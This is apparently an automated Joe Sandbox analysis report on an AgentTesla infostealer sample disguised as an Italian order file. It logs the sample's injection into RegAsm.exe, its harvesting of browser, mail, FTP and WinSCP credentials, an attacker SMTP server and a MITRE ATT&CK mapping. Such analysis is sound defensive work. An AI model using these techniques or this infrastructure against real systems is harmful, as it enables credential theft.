Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_004039C7 mov ebx, dword ptr fs:[00000030h]	0_2_004039C7
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_004037CB mov ebx, dword ptr fs:[00000030h]	0_2_004037CB

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: FB0000

Jump to behavior

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe

Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\ordine n#U00b0 276.exe'

Jump to behavior

Source: RegAsm.exe, 00000008.00000002.1727345684.00000000019E0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: RegAsm.exe, 00000008.00000002.1727345684.00000000019E0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 00000008.00000002.1727345684.00000000019E0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: RegAsm.exe, 00000008.00000002.1727345684.00000000019E0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000008.00000002.1731275850.000000001DD01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1280, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: Yara match	File source: 00000008.00000002.1731275850.000000001DD01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1280, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000008.00000002.1731275850.000000001DD01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1280, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools11	OS Credential Dumping2	System Information Discovery314	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Access Token Manipulation1	Obfuscated Files or Information1	Credentials in Registry1	Query Registry1	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection112	DLL Side-Loading1	Security Account Manager	Security Software Discovery621	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Masquerading1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion341	LSA Secrets	Virtualization/Sandbox Evasion341	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol112	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Access Token Manipulation1	Cached Domain Credentials	Application Window Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection112	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ordine n#U00b0 276.exe	9%	ReversingLabs	Win32.Worm.Wbvb

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
smtp.fil-net.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://crl.pki.goog/gsr1/gsr1.crl0;	0%	Avira URL Cloud	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://9OElorZCtFCqdkfzny.net	0%	Avira URL Cloud	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
http://crl.pki.goog/gtsr1/gtsr1.crl0W	0%	Avira URL Cloud	safe
http://pki.goog/gsr1/gsr1.crt02	0%	Avira URL Cloud	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
http://crls.pki.goog/gts1c3/QqFxbi9M48c.crl0	0%	Avira URL Cloud	safe
https://api.ipify.org%	0%	URL Reputation	safe
https://api.ipify.org%	0%	URL Reputation	safe
https://api.ipify.org%	0%	URL Reputation	safe
http://mGfDbY.com	0%	Avira URL Cloud	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://r3.i.lencr.org/0%	0%	Avira URL Cloud	safe
http://pki.goog/repo/certs/gts1c3.der0	0%	Avira URL Cloud	safe
http://pki.goog/repo/certs/gtsr1.der04	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
smtp.fil-net.com	46.16.61.250	true	true	0%, Virustotal, Browse	unknown
googlehosted.l.googleusercontent.com	216.58.212.129	true	false		high
doc-10-9k-docs.googleusercontent.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://9OElorZCtFCqdkfzny.net	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	RegAsm.exe, 00000008.00000002.1731275850.000000001DD01000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	RegAsm.exe, 00000008.00000002.1731275850.000000001DD01000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.pki.goog/gsr1/gsr1.crl0;	RegAsm.exe, 00000008.00000003.999365877.0000000001401000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cps.letsencrypt.org0	RegAsm.exe, 00000008.00000002.1732276506.000000001FF5D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	RegAsm.exe, 00000008.00000002.1731275850.000000001DD01000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://r3.o.lencr.org0	RegAsm.exe, 00000008.00000002.1732276506.000000001FF5D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://doc-10-9k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ka3e4p4q	RegAsm.exe, 00000008.00000003.999365877.0000000001401000.00000004.00000001.sdmp	false		high
https://api.ipify.org%GETMozilla/5.0	RegAsm.exe, 00000008.00000002.1731275850.000000001DD01000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://crl.pki.goog/gtsr1/gtsr1.crl0W	RegAsm.exe, 00000008.00000003.999365877.0000000001401000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://pki.goog/gsr1/gsr1.crt02	RegAsm.exe, 00000008.00000003.999365877.0000000001401000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://pki.goog/repository/0	RegAsm.exe, 00000008.00000003.999365877.0000000001401000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crls.pki.goog/gts1c3/QqFxbi9M48c.crl0	RegAsm.exe, 00000008.00000003.999365877.0000000001401000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://doc-10-9k-docs.googleusercontent.com/	RegAsm.exe, 00000008.00000002.1726751510.0000000001380000.00000004.00000020.sdmp	false		high
https://api.ipify.org%	RegAsm.exe, 00000008.00000002.1731275850.000000001DD01000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://mGfDbY.com	RegAsm.exe, 00000008.00000002.1731275850.000000001DD01000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cps.root-x1.letsencrypt.org0	RegAsm.exe, 00000008.00000002.1732276506.000000001FF5D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://r3.i.lencr.org/0%	RegAsm.exe, 00000008.00000002.1732276506.000000001FF5D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://pki.goog/repo/certs/gts1c3.der0	RegAsm.exe, 00000008.00000003.999365877.0000000001401000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://pki.goog/repo/certs/gtsr1.der04	RegAsm.exe, 00000008.00000003.999365877.0000000001401000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
216.58.212.129	googlehosted.l.googleusercontent.com	United States		15169	GOOGLEUS	false
46.16.61.250	smtp.fil-net.com	Spain		197712	CDMONsistemescdmoncomES	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	403969
Start date:	04.05.2021
Start time:	15:32:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ordine n#U00b0 276.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.spre.troj.spyw.evad.winEXE@4/2@3/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 15% (good quality ratio 7.6%) Quality average: 33.4% Quality standard deviation: 36.5%
HCA Information:	Successful, ratio: 95% Number of executed functions: 139 Number of non-executed functions: 8
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Excluded IPs from analysis (whitelisted): 104.43.193.48, 52.255.188.83, 92.122.145.220, 20.82.210.154, 92.122.213.247, 92.122.213.194, 2.20.142.209, 2.20.142.210, 142.250.185.78, 52.155.217.156, 20.54.26.129, 20.190.159.135, 20.190.159.137, 20.190.159.133, 40.126.31.9, 40.126.31.7, 40.126.31.136, 40.126.31.3, 40.126.31.142, 51.11.168.232, 40.127.240.158, 51.104.136.2 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, www.tm.lg.prod.aadmsa.akadns.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, www.tm.a.prd.aadg.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, login.live.com, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, drive.google.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, a767.dscg3.akamai.net, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:33:51	API Interceptor	3896x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
46.16.61.250	a5FVSNazgr.exe	Get hash	malicious	Browse
	HdgnMEvcFK.exe	Get hash	malicious	Browse
	RTStyEQJpZ.exe	Get hash	malicious	Browse
	PAGO.xlsx	Get hash	malicious	Browse
	PRESUPUESTO.xlsx	Get hash	malicious	Browse
	Zapytanie -20216470859302.exe	Get hash	malicious	Browse
	winlog.exe	Get hash	malicious	Browse
	PRESUPUESTO.xlsx	Get hash	malicious	Browse
	Nakit Akisi Detaylariniz.exe	Get hash	malicious	Browse
	S67xSX1MNR.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
smtp.fil-net.com	Zapytanie -20216470859302.exe	Get hash	malicious	Browse	46.16.61.250
smtp.fil-net.com	Nakit Akisi Detaylariniz.exe	Get hash	malicious	Browse	46.16.61.250

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CDMONsistemescdmoncomES	a5FVSNazgr.exe	Get hash	malicious	Browse	46.16.61.250
	HdgnMEvcFK.exe	Get hash	malicious	Browse	46.16.61.250
	RTStyEQJpZ.exe	Get hash	malicious	Browse	46.16.61.250
	PAGO.xlsx	Get hash	malicious	Browse	46.16.61.250
	PRESUPUESTO.xlsx	Get hash	malicious	Browse	46.16.61.250
	Zapytanie -20216470859302.exe	Get hash	malicious	Browse	46.16.61.250
	njGJ1eW44wshoMr.exe	Get hash	malicious	Browse	46.16.62.134
	3nG9LW7Z21dxUoM.exe	Get hash	malicious	Browse	46.16.62.134
	keeFDE9dhCGNNez.exe	Get hash	malicious	Browse	46.16.62.134
	74tF1foMeQyUMCh.exe	Get hash	malicious	Browse	46.16.62.134
	qm7JU84PFgfqvgs.exe	Get hash	malicious	Browse	46.16.62.134
	winlog.exe	Get hash	malicious	Browse	46.16.61.250
	PRESUPUESTO.xlsx	Get hash	malicious	Browse	46.16.61.250
	WbGKi8E5OE4eCFG.exe	Get hash	malicious	Browse	46.16.62.134
	r9SWnqQlK8PFPEp.exe	Get hash	malicious	Browse	46.16.62.134
	L9oOm9x3I7YZFcA.exe	Get hash	malicious	Browse	46.16.62.134
	SecuriteInfo.com.Trojan.DownLoader36.34557.26355.exe	Get hash	malicious	Browse	134.0.10.35
	jKiL1mzTAVltJ30.exe	Get hash	malicious	Browse	46.16.62.134
	09xcuRN2HJmRRCm.exe	Get hash	malicious	Browse	46.16.62.134
	57229937-122020-4-7676523.doc	Get hash	malicious	Browse	185.66.41.128

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	statistic-2067311372.xlsm	Get hash	malicious	Browse	216.58.212.129
	statistic-2069354685.xlsm	Get hash	malicious	Browse	216.58.212.129
	statistic-2070252624.xlsm	Get hash	malicious	Browse	216.58.212.129
	statistic-2072807337.xlsm	Get hash	malicious	Browse	216.58.212.129
	statistic-207394368.xlsm	Get hash	malicious	Browse	216.58.212.129
	f97e137e_by_Libranalysis.exe	Get hash	malicious	Browse	216.58.212.129
	e1df57de_by_Libranalysis.xls	Get hash	malicious	Browse	216.58.212.129
	MV RED SEA.docx	Get hash	malicious	Browse	216.58.212.129
	MyUY1HeWNL.exe	Get hash	malicious	Browse	216.58.212.129
	IMG-WA7905432.exe	Get hash	malicious	Browse	216.58.212.129
	catalog-1521295750.xlsm	Get hash	malicious	Browse	216.58.212.129
	Documents_111651917_375818984.xls	Get hash	malicious	Browse	216.58.212.129
	Remittance Advice pdf.exe	Get hash	malicious	Browse	216.58.212.129
	#U260e#Ufe0fAUDIO-2020-05-26-18-51-m4a_MP4messages_2202-434.htm	Get hash	malicious	Browse	216.58.212.129
	Documents_95326461_1831689059.xls	Get hash	malicious	Browse	216.58.212.129
	Tree Top.html	Get hash	malicious	Browse	216.58.212.129
	PT6-1152.doc	Get hash	malicious	Browse	216.58.212.129
	s.dll	Get hash	malicious	Browse	216.58.212.129
	setup-lightshot.exe	Get hash	malicious	Browse	216.58.212.129
	s.dll	Get hash	malicious	Browse	216.58.212.129

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Roaming\3blxsn2e.5rk\Chrome\Default\Cookies Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	modified
Size (bytes):	20480
Entropy (8bit):	0.7006690334145785
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
MD5:	A7FE10DA330AD03BF22DC9AC76BBB3E4
SHA1:	1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
SHA-256:	8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
SHA-512:	1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	3.964735178725505
Encrypted:	false
SSDEEP:	3:IBVFBWAGRHneyy:ITqAGRHner
MD5:	9F754B47B351EF0FC32527B541420595
SHA1:	006C66220B33E98C725B73495FE97B3291CE14D9
SHA-256:	0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512:	C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	NordVPN directory not found!..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	4.764868199016906
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ordine n#U00b0 276.exe
File size:	98304
MD5:	10f03c95ba280cd5a82146269f89ca9d
SHA1:	c24232721d7aefe2c013b9642e0ab7db8007e48a
SHA256:	11f63d2fda1055ac66a71cb539c9d5ff66fd79f473e19171fd8f663e2c4979b9
SHA512:	4b537aec0eee96b506ac63fcbdffc4e1e2ac231ca8d5136cfe7a67e84ac5643424d7090ae88ddb3e809d94272fa15edb20ed70964076fbf05260dceabac5ab76
SSDEEP:	1536:kh70hrnoEdQNvX1/o3IAEmYY6qbtug0Oj1o/:kl0tnoO81/4OYZJGO5S
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.......0...~...0.......0...Rich1...........PE..L.....UQ.................P... ......\|........`....@................

File Icon


Icon Hash:	b074cecec891b2e4

Static PE Info

General
Entrypoint:	0x40157c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x51551DDA [Fri Mar 29 04:51:38 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	631ffe9ad0b821781f48149fabda62f6

Entrypoint Preview

Instruction
push 0040CC14h
call 00007FADB0C84B55h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esp], bl
or eax, CA69BFC2h
inc edi
lodsb
jmp far 22F3h : 4FE1EAFFh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
or eax, 270A0D0Ah
dec ebp
push ebp
dec esi
push edx
inc ebp
push ecx
push ebp
dec ecx
push esp
add byte ptr [0A0D200Ah], cl
or eax, 0000000Ah
add bh, bh
int3
xor dword ptr [eax], eax
sub byte ptr [ecx-1Bh], bl
aaa
int3
std
mov dword ptr [F68E487Eh], eax
pop ebx
or eax, AFD57F95h
jl 00007FADB0C84B3Dh
test eax, E711F84Fh
dec edi
pushfd
adc dword ptr [esi+48E65169h], ebx
sub al, 3Ah
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor eax, 470000B5h
add al, byte ptr [eax]
add byte ptr [eax], al
add al, 00h
insd
popad
jc 00007FADB0C84BCFh
add byte ptr [43000501h], cl
dec edi
push esi
inc ebp
push esp
add byte ptr [ecx], bl
add dword ptr [eax], eax
inc edx

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x15054	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x17000	0x5a4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x10c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x144d0	0x15000	False	0.33740234375	data	5.19887366844	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x16000	0xad4	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
